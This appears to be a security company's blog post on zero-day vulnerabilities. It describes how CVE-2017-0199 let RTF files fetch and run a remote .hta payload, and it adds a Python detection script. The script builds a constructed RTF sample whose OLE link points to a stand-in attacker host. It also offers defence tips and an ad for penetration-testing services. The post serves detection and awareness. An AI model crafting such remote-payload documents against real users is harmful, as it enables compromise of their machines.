Our networked systems, whether computers, databases, phones, or other devices, are an endless battlefield. Zero-day exploits have been in the news in the wake of the Wikileaks disclosures, in which a number of such exploits were posted where anyone who was interested could read how to use them. Many are worried about what this means for their own security and privacy.
What exactly is a zero-day exploit?
A zero-day vulnerability is a flaw in a system that its developers have not yet had time to patch; a zero-day exploit is the code or technique that takes advantage of such a flaw, and the two terms are often used loosely for the same threat. The "zero" counts the days the defenders and developers have known about the flaw, not its age: such flaws can exist for many years before they are discovered by the developers, by penetration testers, or, unfortunately, by an attacker. It is a constant race to locate such vulnerabilities before a hacker does, because they are hidden holes in the wall of defense.
These flaws will exist until they are patched or the affected code is removed or replaced by an upgrade. Fortunately, many of the particular exploits described in the "Vault 7" documents have already been fixed by patches, some even before the documents were posted publicly, because the software vendors had been alerted to the exploits beforehand. Provided users have installed those patches, the exploits no longer work against their systems.
More flaws, exploits, and vulnerabilities will inevitably exist, simply by the nature of software development and the interaction of so many different systems. The battle to defend continues, as it always has.
What kind of threats are they?
An example zero-day vulnerability is one found in Microsoft Word earlier this month (CVE-2017-0199), which has since been patched. The flaw was in the Object Linking and Embedding (OLE) handling in Microsoft Office: simply opening a malicious RTF file (typically sent with a .doc extension so that Word would open it) made the program connect to a remote server and automatically download and run a file (an HTML Application, .hta), giving the attacker full control of the computer. The user, meanwhile, only saw a decoy Word document, unaware that malware had already been installed. McAfee found the vulnerability in early April and alerted Microsoft and the public so that protections could be put in place quickly; the discovery, however, came only after attackers had been using the exploit for a few months.
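The following is an added example, not code from the original post or from McAfee or Microsoft. It is a small Python triage script that flags RTF documents carrying the combination the paragraph above describes: an OLE object marked to refresh itself when the document opens (the \objautlink and \objupdate control words) whose hex-encoded \objdata blob contains a remote URL, or the "OLE2Link" string that the script treats as a link-object indicator. The two sample documents, the host attacker.invalid, the file name payload.hta, and the byte layout of the constructed blob are assumptions for illustration; real malicious files differ in layout, so a hit is a reason to inspect the file, not proof that it is malicious.

```python
import re
from dataclasses import dataclass

# Control words that make Word refresh a linked object when the document opens.
AUTO_UPDATE_FLAGS = {"objautlink", "objupdate"}
CONTROL_WORD_RE = re.compile(r"\\([a-z]+)")
ASCII_URL_RE = re.compile(rb"(?:https?|file)://[\x21-\x7e]+")
TEXT_URL_RE = re.compile(r"(?:https?|file)://[\x21-\x7e]+")


@dataclass
class OleObjectFinding:
    flags: set        # control words seen inside the {\object ...} group
    obj_class: str    # ProgID from \objclass, "" if absent
    urls: list        # URLs recovered from the hex-decoded \objdata blob
    ole2link: bool    # "OLE2Link" marker present in the blob

    @property
    def suspicious(self) -> bool:
        # An object that auto-refreshes on open AND has something remote to fetch.
        return bool(self.flags & AUTO_UPDATE_FLAGS) and (bool(self.urls) or self.ole2link)


def rtf_groups(text: str, name: str):
    """Yield the source of every RTF group opening with {\\<name>, honouring nesting and \\{ \\} escapes."""
    needle = "{\\" + name
    pos = text.find(needle)
    while pos != -1:
        depth, i = 0, pos
        while i < len(text):
            ch = text[i]
            if ch == "\\":
                i += 2          # skip the escaped character (covers \{ \} \\)
                continue
            if ch == "{":
                depth += 1
            elif ch == "}":
                depth -= 1
                if depth == 0:
                    yield text[pos:i + 1]
                    break
            i += 1
        pos = text.find(needle, pos + 1)


def decode_objdata(group: str) -> bytes:
    """Hex-decode the {\\*\\objdata ...} payload; RTF allows whitespace inside the hex run."""
    m = re.search(r"\\objdata\s*([0-9A-Fa-f\s]+)\}", group)
    if not m:
        return b""
    digits = re.sub(r"\s+", "", m.group(1))
    if len(digits) % 2:
        digits = digits[:-1]      # tolerate a truncated trailing nibble
    try:
        return bytes.fromhex(digits)
    except ValueError:
        return b""


def extract_urls(blob: bytes) -> list:
    """Find URLs stored as ASCII or as UTF-16LE (how Word serialises link monikers)."""
    found = [u.decode("ascii") for u in ASCII_URL_RE.findall(blob)]
    for offset in (0, 1):         # try both alignments of a UTF-16 string
        found += TEXT_URL_RE.findall(blob[offset:].decode("utf-16-le", errors="ignore"))
    return list(dict.fromkeys(found))   # de-duplicate, keep order


def scan_rtf(text: str) -> list:
    """Return one OleObjectFinding per {\\object ...} group in the document."""
    findings = []
    for group in rtf_groups(text, "object"):
        cls = re.search(r"\\objclass\s+([^}\\]+)", group)
        blob = decode_objdata(group)
        findings.append(OleObjectFinding(
            flags=set(CONTROL_WORD_RE.findall(group)),
            obj_class=cls.group(1).strip() if cls else "",
            urls=extract_urls(blob),
            ole2link=b"OLE2Link" in blob,
        ))
    return findings


def is_suspicious_rtf(text: str) -> bool:
    return any(f.suspicious for f in scan_rtf(text))


# --- constructed samples, not real malware; the blob layout is an assumption ---
def _objdata_hex(url: str) -> str:
    blob = (b"\x01\x05\x00\x00\x02\x00\x00\x00" + b"OLE2Link" + b"\x00" * 8
            + url.encode("utf-16-le") + b"\x00\x00")
    return blob.hex()

MALICIOUS_RTF = (
    r"{\rtf1\ansi\deff0"
    r"{\object\objautlink\objupdate\objw1\objh1"
    r"{\*\objclass Word.Document.8}"
    r"{\*\objdata " + _objdata_hex("http://attacker.invalid/payload.hta") + r"}}"
    r"\par Quarterly report attached.}"
)

BENIGN_RTF = (
    r"{\rtf1\ansi\deff0"
    r"{\object\objemb\objw1\objh1"
    r"{\*\objclass Excel.Sheet.8}"
    r"{\*\objdata " + b"\x01\x05\x00\x00\x02\x00\x00\x00".hex() + r"}}"
    r"\par Budget figures.}"
)

if __name__ == "__main__":
    for label, doc in (("malicious", MALICIOUS_RTF), ("benign", BENIGN_RTF)):
        for f in scan_rtf(doc):
            print(label, f.obj_class, sorted(f.flags & AUTO_UPDATE_FLAGS), f.urls,
                  "SUSPICIOUS" if f.suspicious else "ok")
```

Run it on a mail-gateway quarantine or a sample directory by reading each file as text and passing it to scan_rtf; the script deliberately flags on the combination of auto-update flags and a remote reference rather than on either alone, because embedded OLE objects and linked objects are both common in legitimate documents.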
Other zero-days have involved open ports created by a phone app, embedded Flash files, and even code execution through downloaded TrueType font files. Anything that parses untrusted input is a potential target, whether that input arrives as a download or through a browser, even just by opening a web page.
What is frightening about a zero-day is that no patch has yet been released to close the flaw. It is a new, open hole in your security that may already have been used against you without your knowing.
How do I defend against a Zero-Day?
- Basic safe computing tips apply: ignore unsolicited emails, be wary of suspicious links and attachments, use secure connections, use a firewall, and avoid untrustworthy downloads.
- Be cautious when opening or downloading any new file or software.
- Use antivirus: beyond blocking the trojans, viruses, and malware it already recognizes, some products catch programs whose behaviour or structure resembles known threats, which can stop a new exploit's payload even when the exploit itself is unknown.
- Use whitelisting (application allow-listing): prevent anything from running without explicit administrator authorization, and block unauthorized executable files. This limits what an exploit can do once it gets in.
- Patch regularly. Keep your systems up to date: from the moment a zero-day becomes known it remains a threat on your system until you have patched it, if a patch exists yet. Once a patch is released, attackers scan for those who have not applied it and use the hole before you update.
- If possible: penetration test!
This is a race between the bad guys and the good guys. The penetration testers and security teams are the line of defense, searching for any holes in the system, be it within an internal network, wireless network, mobile apps, or the web. If you are interested in having your company or software penetration-tested, Tiro Security offers quality services at competitive prices; contact us to start a conversation about this front-line defense.
We are going to be attending the Ninth ISSA Conference at the Universal City Hilton on the 19th May so please come join us at our booth. You can buy tickets at: https://summit.issala.org/ and use our code for 20% off: LRNW